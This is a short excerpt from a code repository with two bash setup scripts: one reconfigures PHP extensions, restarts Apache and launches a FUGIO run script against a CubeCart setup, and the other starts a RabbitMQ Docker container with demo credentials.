13 | 


--------------------------------------------------------------------------------
/run_FUGIO_cubecart_all.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | BASEDIR=$(dirname "$0")
 4 | HOSTIP=172.17.0.1
 5 | 
 6 | sed -ri -e "s/^; extension=runkit.so/extension=runkit.so/" /usr/local/lib/php.ini
 7 | sed -ri -e "s/^; runkit.internal_override=1/runkit.internal_override=1/" /usr/local/lib/php.ini
 8 | sed -ri -e "s/^; zend_extension=\/usr\/local\/lib\/php\/extensions\/no-debug-non-zts-20100525\/ioncube_loader_lin_5.4.so/zend_extension=\/usr\/local\/lib\/php\/extensions\/no-debug-non-zts-20100525\/ioncube_loader_lin_5.4.so/" /usr/local/lib/php.ini
 9 | sed -ri -e "s/^extension=uopz.so/; extension=uopz.so/" /usr/local/lib/php.ini
10 | apache2ctl restart
11 | 
12 | $BASEDIR/run.py --rabbitmq_ip=$HOSTIP --hook_extension=runkit --all $@
13 | 


--------------------------------------------------------------------------------
/run_rabbitmq.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | USER=fugio
 4 | PASS=fugio_password
 5 | docker run -d --name rabbitmq -p 5672:5672 -p 15672:15672 -p 25672:25672 \
 6 | 	--restart=unless-stopped \
 7 | 	-e RABBITMQ_DEFAULT_USER=$USER \
 8 | 	-e RABBITMQ_DEFAULT_PASS=$PASS \
 9 | 	rabbitmq:management
10 | 
11 | 


--------------------------------------------------------------------------------